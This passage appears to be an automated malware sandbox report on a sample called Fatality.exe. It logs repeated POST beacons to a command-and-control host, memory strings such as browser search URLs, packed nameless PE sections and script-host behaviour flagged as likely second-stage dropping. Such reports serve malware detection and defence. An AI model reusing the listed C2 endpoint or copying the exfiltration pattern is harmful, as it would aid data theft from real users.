                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 1840Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2512Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 1820Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 1820Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 1840Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2512Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficDNS traffic detected: DNS query: 373292cm.nyashka.top
                              Source: unknownHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.00000000037B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://373292cm.nyP
                              Source: EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.0000000003B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://373292cm.nyP2
                              Source: EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.0000000003B02000.00000004.00000800.00020000.00000000.sdmp, EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.0000000003532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://373292cm.nyashka.top
                              Source: EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.0000000003532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://373292cm.nyashka.top/
                              Source: EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.0000000003618000.00000004.00000800.00020000.00000000.sdmp, EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.0000000003673000.00000004.00000800.00020000.00000000.sdmp, EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.0000000003B02000.00000004.00000800.00020000.00000000.sdmp, EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.0000000003532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php
                              Source: WebCacheV01.dat.8.dr, V01.log.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                              Source: WebCacheV01.dat.8.dr, V01.log.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                              Source: WebCacheV01.dat.8.dr, V01.log.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                              Source: WebCacheV01.dat.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                              Source: WebCacheV01.dat.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
                              Source: WebCacheV01.dat.8.dr, V01.log.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
                              Source: WebCacheV01.dat.8.dr, V01.log.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                              Source: WebCacheV01.dat.8.dr, V01.log.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                              Source: WebCacheV01.dat.8.drString found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
                              Source: WebCacheV01.dat.8.dr, V01.log.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                              Source: WebCacheV01.dat.8.dr, V01.log.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                              Source: WebCacheV01.dat.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                              Source: WebCacheV01.dat.8.dr, V01.log.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                              Source: WebCacheV01.dat.8.dr, V01.log.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
                              Source: WebCacheV01.dat.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
                              Source: WebCacheV01.dat.8.dr, V01.log.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                              Source: WebCacheV01.dat.8.dr, V01.log.8.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                              Source: WebCacheV01.dat.8.drString found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
                              Source: WebCacheV01.dat.8.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                              Source: WebCacheV01.dat.8.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                              Source: WebCacheV01.dat.8.dr, V01.log.8.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                              Source: WebCacheV01.dat.8.dr, V01.log.8.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                              Source: WebCacheV01.dat.8.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
                              Source: WebCacheV01.dat.8.dr, V01.log.8.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                              Source: WebCacheV01.dat.8.dr, V01.log.8.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                              Source: WebCacheV01.dat.8.drString found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
                              Source: WebCacheV01.dat.8.dr, V01.log.8.drString found in binary or memory: http://ocsp.digicert.com0
                              Source: WebCacheV01.dat.8.drString found in binary or memory: http://ocsp.digicert.com0:
                              Source: WebCacheV01.dat.8.dr, V01.log.8.drString found in binary or memory: http://ocsp.digicert.com0H
                              Source: WebCacheV01.dat.8.dr, V01.log.8.drString found in binary or memory: http://ocsp.digicert.com0I
                              Source: WebCacheV01.dat.8.drString found in binary or memory: http://ocsp.digicert.com0Q
                              Source: WebCacheV01.dat.8.drString found in binary or memory: http://ocsp.msocsp.com0
                              Source: WebCacheV01.dat.8.drString found in binary or memory: http://ocsp.msocsp.com0S
                              Source: BridgeInto.exe, 00000006.00000002.2336699470.000000000373F000.00000004.00000800.00020000.00000000.sdmp, EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.0000000003532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: WebCacheV01.dat.8.dr, V01.log.8.drString found in binary or memory: http://www.digicert.com/CPS0
                              Source: WebCacheV01.dat.8.dr, V01.log.8.drString found in binary or memory: http://www.digicert.com/CPS0~
                              Source: Fatality.exe, 00000000.00000002.2133322697.0000000000982000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.enigmaprotector.com/
                              Source: Fatality.exe, 00000000.00000002.2133322697.0000000000982000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.enigmaprotector.com/openU
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL
                              Source: EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3399676352.0000000013807000.00000004.00000800.00020000.00000000.sdmp, EluSdKNM7k.25.dr, fHEg1gEt1n.25.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
                              Source: WebCacheV01.dat.8.dr, V01.log.8.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
                              Source: EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3399676352.0000000013807000.00000004.00000800.00020000.00000000.sdmp, EluSdKNM7k.25.dr, fHEg1gEt1n.25.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                              Source: EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3399676352.0000000013807000.00000004.00000800.00020000.00000000.sdmp, EluSdKNM7k.25.dr, fHEg1gEt1n.25.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                              Source: EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3399676352.0000000013807000.00000004.00000800.00020000.00000000.sdmp, EluSdKNM7k.25.dr, fHEg1gEt1n.25.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
                              Source: WebCacheV01.dat.8.dr, V01.log.8.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                              Source: EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3399676352.0000000013807000.00000004.00000800.00020000.00000000.sdmp, EluSdKNM7k.25.dr, fHEg1gEt1n.25.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                              Source: EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3399676352.0000000013807000.00000004.00000800.00020000.00000000.sdmp, EluSdKNM7k.25.dr, fHEg1gEt1n.25.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                              Source: EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3399676352.0000000013807000.00000004.00000800.00020000.00000000.sdmp, EluSdKNM7k.25.dr, fHEg1gEt1n.25.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?0684adfa5500b3bab63593997d26215c
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?79b1312614e5ac304828ba5e1fdb4fa3
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?7ae939fc98ce1346dd2e496abdba2d3b
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?9f3db9405f1b2793ad8d8de9770248e4
                              Source: WebCacheV01.dat.8.dr, V01.log.8.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?4aec53910de6415b25f2c4faf3f7e54a
                              Source: WebCacheV01.dat.8.dr, V01.log.8.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?77290711a5e44a163ac2e666ad7b53fd
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-30-24/PreSignInSettingsConfig.json?One
                              Source: WebCacheV01.dat.8.dr, V01.log.8.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-40-12/PreSignInSettingsConfig.json
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=14d1c105224b3e736c3c
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=7fe112
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://www.digicert.com/CPS0
                              Source: EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3399676352.0000000013807000.00000004.00000800.00020000.00000000.sdmp, EluSdKNM7k.25.dr, fHEg1gEt1n.25.drString found in binary or memory: https://www.ecosia.org/newtab/
                              Source: EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3399676352.0000000013807000.00000004.00000800.00020000.00000000.sdmp, EluSdKNM7k.25.dr, fHEg1gEt1n.25.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                              Source: WebCacheV01.dat.8.drString found in binary or memory: https://www.office.com/
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWindow created: window name: CLIPBRDWNDCLASS

                              System Summary

                              barindex
                              PE file has nameless sections
                              Source: Fatality.exeStatic PE information: section name:
                              Source: Fatality.exeStatic PE information: section name:
                              Source: Fatality.exeStatic PE information: section name:
                              Source: Fatality.exeStatic PE information: section name:
                              Source: Fatality.exeStatic PE information: section name:
                              Source: Fatality.exeStatic PE information: section name:
                              Source: Fatality.exeStatic PE information: section name:
                              Windows Scripting host queries suspicious COM object (likely to drop second stage)
                              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_04D5685F NtQueryInformationProcess,GetSystemInfo,0_2_04D5685F
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSCC3741A71028464F81756764D7843821.TMPJump to behavior
